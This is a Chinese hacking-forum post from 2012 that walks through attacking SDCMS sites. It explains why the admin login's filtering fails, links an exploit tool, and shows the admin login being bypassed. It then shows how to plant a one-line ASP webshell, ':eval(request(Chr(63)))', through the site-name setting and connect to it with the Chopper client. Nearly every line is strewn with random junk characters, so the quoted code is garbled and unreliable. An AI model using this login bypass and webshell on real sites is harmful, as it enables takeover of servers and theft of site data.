作者:T00LS 鬼哥3 q! O' a( _7 P: o
漏洞文件:后台目录/index.asp
' p! ^, B/ f7 J8 j& a) t; {+ z: X3 E+ j' N2 J6 K, e3 `. B
Sub Check
r6 \6 U: q# W% a7 \$ f$ O Dim username,password,code,getcode,Rs' z3 \% }2 D+ ?% f3 L: b
IF Check_post Then Echo "1禁止从外部提交数据!":Exit Sub
5 Q5 K) R- H- Z username=FilterText(Trim(Request.Form("username")),1)# D4 H$ ^: o7 _( a, E0 m: R- m( ]) u
password=FilterText(Trim(Request.Form("password")),1)9 q6 R5 j8 z- A/ X! r! g
code=Trim(Request.Form("yzm"))
1 N7 R9 f3 C; h; W0 F getcode=Session("SDCMSCode")) D8 A% }" r. Q% ` k+ \' o6 I
IF errnum>=loginnum Then Echo "系统已禁止您今日再登录":died" h4 x- z" G/ y9 N* _8 g' F
IF code="" Then Alert "验证码不能为空!","javascript:history.go(-1)" ied
+ m3 s; T L$ B( H7 \6 b IF code<>"" And Not Isnumeric(code) Then Alert "验证码必须为数字!","javascript:history.go(-1)"ied# c: }8 g: o! z6 R
IF code<>getcode Then Alert "验证码错误!","javascript:history.go(-1)"ied6 x# }8 O. ^9 Q/ e/ D( [
IF username="" or password="" Then
; E2 h- j& [; W5 @5 ]; p Echo "用户名或密码不能为空"ied2 T4 a7 \! X' w5 t M8 y- E
Else
$ O/ N \6 z. t& f# U8 x$ i Set Rs=Conn.Execute("Select Id,Sdcms_Name,Sdcms_Pwd,isadmin,alllever,infolever From Sd_Admin Where Sdcms_name='"&username&"' And Sdcms_Pwd='"&md5(password)&"'")
8 r0 V! f7 W$ }; } IF Rs.Eof Then
" C/ |3 b9 |% G; T AddLog username,GetIp,"登录失败",1( S, L; W$ X+ d; E) ?
Echo "用户名或密码错误,今日还有 "&loginnum-errnum&" 次机会"8 e$ |4 ?/ a" k" R
Else* B% ~+ q' h2 E8 w( A8 U& A1 Y
Add_Cookies "sdcms_id",Rs(0)9 A/ b) v$ M; x; j2 T1 _- g
Add_Cookies "sdcms_name",username
" W$ n3 n ?; K. o! V$ r8 ~9 V7 @0 ?+ f Add_Cookies "sdcms_pwd",Rs(2)! {: Z$ X8 U: K: z& y6 K# t8 w; t
Add_Cookies "sdcms_admin",Rs(3)1 `1 U4 _! l5 P* m1 p% i4 E( b
Add_Cookies "sdcms_alllever",Rs(4)- \( h l6 u I6 _3 j C2 ?8 n
Add_Cookies "sdcms_infolever",Rs(5)
6 p, A& Z4 W8 w: {- n; g Conn.Execute("Update Sd_Admin Set logintimes=logintimes+1,LastIp='"&GetIp&"' Where id="&Rs(0)&"")
" S/ i# i( A: V6 [3 j AddLog username,GetIp,"登录成功",15 I0 o% p! l$ @. @5 h( J9 z
'自动删除30天前的Log记录
3 }/ l7 f9 T) i. {8 g IF Sdcms_DataType Then6 A) C3 f. t* A9 t7 U5 s1 M
Conn.Execute("Delete From Sd_Log Where DateDiff('d',adddate,Now())>30")
' T6 K( \6 v- ^+ | Else
- p6 ^- l* ^$ p9 F Conn.Execute("Delete From Sd_Log Where DateDiff(d,adddate,GetDate())>30")
: Y' d+ v2 u! D! b7 y End IF
/ z+ Q! N8 I% i d Go("sdcms_index.asp")
7 R A o0 ?3 `) z2 q End IF& _4 b$ ]- I- \- O
Rs.Close4 U0 j# [6 f+ {; s
Set Rs=Nothing
( Z3 ]) v' u. {5 ^5 l# F* y End IF1 }+ h7 a4 d6 h2 N
End Sub5 |* w$ A2 Q9 `7 ~2 }
2 H8 O3 e' v/ u. |; L8 t’我们可以看到username是通过FilterText来过滤的。我们看看FilterText的代码' c+ K; t' X! W% T# d* {
1 Y2 t3 L7 v4 zFunction FilterText(ByVal t0,ByVal t1)7 l8 _5 u6 R! F5 b/ {
IF Len(t0)=0 Or IsNull(t0) Or IsArray(t0) Then FilterText="":Exit Function% h" O( V+ P, P0 ^4 p- J( B4 l
t0=Trim(t0)
$ l: f, O& k. s, L+ i Select Case t1
8 g9 ]1 N+ ]8 l9 Y Case "1"
3 O9 D1 b% q8 e! G$ Z9 R8 z t0=Replace(t0,Chr(32),"")
9 E- p8 f" ?: l. L* s1 ?4 y t0=Replace(t0,Chr(13),"")
0 W+ a( z7 c# ^6 q6 { t0=Replace(t0,Chr(10)&Chr(10),"")9 s1 |7 y8 X) N* A
t0=Replace(t0,Chr(10),"")
. ?4 y# O7 K2 { R Case "2"
% G& l6 z) v L' ^; n, g% T# w t0=Replace(t0,Chr(8),"")'回格$ Z0 i0 e" E6 A4 J: ?; `8 e
t0=Replace(t0,Chr(9),"")'tab(水平制表符)$ d: d2 B4 Q( `, o
t0=Replace(t0,Chr(10),"")'换行
( @0 t$ r( x# {) U9 n t0=Replace(t0,Chr(11),"")'tab(垂直制表符)" P) M$ Q( G2 W* T7 I/ G
t0=Replace(t0,Chr(12),"")'换页7 m% o) ^/ O. F# c
t0=Replace(t0,Chr(13),"")'回车 chr(13)&chr(10) 回车和换行的组合
# B; e8 E$ k, t t0=Replace(t0,Chr(22),"")4 F+ F" f9 S# E
t0=Replace(t0,Chr(32),"")'空格 SPACE
; }$ W0 H: G% R4 y t0=Replace(t0,Chr(33),"")'!
4 h0 r" c" T( z7 ~2 L A t0=Replace(t0,Chr(34),"")'"
$ F0 [+ |6 T y# @% C3 ^! A t0=Replace(t0,Chr(35),"")'#
/ m1 V9 M2 g7 ~; q, | t0=Replace(t0,Chr(36),"")'$
' R$ ?! A; o* v: D t0=Replace(t0,Chr(37),"")'%- ?. A4 ~, D F" ~. Q Z1 g% a
t0=Replace(t0,Chr(38),"")'&
( [5 R/ Q( J: e% |! o8 ` t0=Replace(t0,Chr(39),"")''
' }$ T+ I! |( f1 D7 w2 H. ]# H' r t0=Replace(t0,Chr(40),"")'(
' N$ v- G; P& g' C+ w7 o t0=Replace(t0,Chr(41),"")')
]/ d; a4 U, S+ w) g& j9 t t0=Replace(t0,Chr(42),"")'*" x3 ?) N, i- t- f% X
t0=Replace(t0,Chr(43),"")'+1 D6 T' K) X4 O# P" m2 K
t0=Replace(t0,Chr(44),"")',, b& _- I! _* g- k
t0=Replace(t0,Chr(45),"")'-
& K: s t! ]( `, f' C3 e; P- k t0=Replace(t0,Chr(46),"")'.
! K/ T7 g% r V- f2 g t0=Replace(t0,Chr(47),"")'/" W: m+ v* X4 V7 ~
t0=Replace(t0,Chr(58),"")':
r" P3 a% j5 Q. ]( m; l t0=Replace(t0,Chr(59),"")';9 D6 ]& T8 G8 m
t0=Replace(t0,Chr(60),"")'< t0=Replace(t0,Chr(61),"")'= t0=Replace(t0,Chr(62),"")'>
, W$ Z& J7 N! J. w( g5 w3 L( C t0=Replace(t0,Chr(63),"")'?- ~) ]/ ? I, ]( O4 v6 z
t0=Replace(t0,Chr(64),"")'@
9 |- W! n4 h) b t0=Replace(t0,Chr(91),"")'\
" z! S4 ^! }2 g- L* k t0=Replace(t0,Chr(92),"")'\+ _( {" Y; C; p$ _1 P$ }& i! @
t0=Replace(t0,Chr(93),"")']8 {) M( x4 ^& B$ f$ p. k1 U
t0=Replace(t0,Chr(94),"")'^4 H+ ` E/ Q+ @+ F2 {) G8 p/ N! d& h
t0=Replace(t0,Chr(95),"")'_& w+ A+ N4 {+ U
t0=Replace(t0,Chr(96),"")'`: @2 K: y ]4 O. m% X
t0=Replace(t0,Chr(123),"")'{
9 n5 G6 A( f+ h3 w7 B2 ? t0=Replace(t0,Chr(124),"")'|
, v7 z$ I9 C+ T( n, @. ^* P t0=Replace(t0,Chr(125),"")'}
* C; G+ `3 Q% j' H! ~# p( I8 n t0=Replace(t0,Chr(126),"")'~
$ A1 t j# t3 C. R# w7 Y* I Case Else
! \6 g4 l: N' o" `8 h O t0=Replace(t0, "&", "&")1 _% d# f0 n& n. o5 y+ ^5 K
t0=Replace(t0, "'", "'")
, z( \5 ~$ r8 U t0=Replace(t0, """", """)
: f) N# S$ O- a" u4 h, } t0=Replace(t0, "<", "<") t0=Replace(t0, ">", ">")5 R9 S# y0 p& ]- O8 N
End Select
8 ]% i {" i g, |; u IF Instr(Lcase(t0),"expression")>0 Then
% O9 S8 P9 C5 P( D. _ t0=Replace(t0,"expression","e­xpression", 1, -1, 0)% d; { Z# |, _ S
End If" k* {) L: e5 m) v
FilterText=t0- N" Z4 h" x# Y- b; ]# L
End Function
C6 b6 D: L% g1 Z5 Z( M6 v8 E( r- e" n+ I2 Z% P# D, r
看到没。直接参数是1 只过滤6 m' u# o* O- X n8 L [5 X, s
t0=Replace(t0,Chr(32)," ")1 y' j) d( Z" U- Y, a
t0=Replace(t0,Chr(13),"")
1 [) R' B3 V3 }$ z8 U* l& y t0=Replace(t0,Chr(10)&Chr(10),"
/ r# k. v g1 J% w4 F5 B9 ]")
- S5 K6 v: `/ l. t* W t0=Replace(t0,Chr(10),"8 r( u+ v- y' i+ W8 n; T+ E
")2 @* x. [4 g4 ^$ t9 {# D
漏洞导致可以直接拿到后台帐号密码。SDCMS默认后台地址/admin/如果站长改了后台路径,那么请自行查找!% } ^0 h0 V2 f _
EXP利用工具下载 (此工具只能在XP上运行):sdcms-EXP9 f8 W. Z# R% Z) e
$ |6 E5 E0 X' f& W& I% N测试:
! w! _+ g8 K! {7 C- S
! ?' C% p& [- f" ~, h4 N; |9 _# ~( ^
现在输入工具上验证码,然后点OK
7 W; n1 o5 R- y. [7 K$ ? V; \! N6 p9 t4 c( `! r, b
' {# W- W% T* x5 Y# l2 N- G
看到我们直接进入后台管理界面了,呵呵!' x* b0 a* T7 X* L0 E
) J. c. U9 h. h0 @8 C0 e5 u& C0 U
5 W: G H- E( x/ |& F6 [; H( h. H: b- n" C }, b/ y
这样直接进入后台了。。。。% y5 ^. Q; P: L
& d8 W c* n9 @ 0 H& j" t8 y7 Z/ e9 c+ ]
3 `+ @5 f7 O6 T( _! L' N/ NSDCMS提权:. R" p- h6 c2 }, `3 U8 m
" H$ ]: ?9 T0 H" c& ?
方法1:访问:/后台目录/sdcms_set.asp 在 网站名称:后面加个 “:eval(request(Chr(63)))’ 即可,直接写一句话进去。 写入到/inc/Const.asp 一句话连接密码是?
4 f1 V& U2 @ L! e6 @- |$ I$ n% O/ ~1 E1 [6 z# V1 f
1 Z$ B' ^% a. c) B4 W7 U. n1 l5 o- [5 O4 B- W4 g
OK,现在用菜刀连接下!$ F7 S$ y4 F: ?3 u# @* h7 {( I4 w% p( u
4 O6 t; [( h" g* C& f
& i# A% R+ S7 l9 O8 S4 E4 i6 O
* y3 S5 w6 A4 R6 M$ N
# N; j6 m( G! g1 Y1 h1 z# v9 \. @( t( k7 E/ k, E. `% ^1 ~
|
发表于 2012-11-9 20:57:02
收藏
支持
反对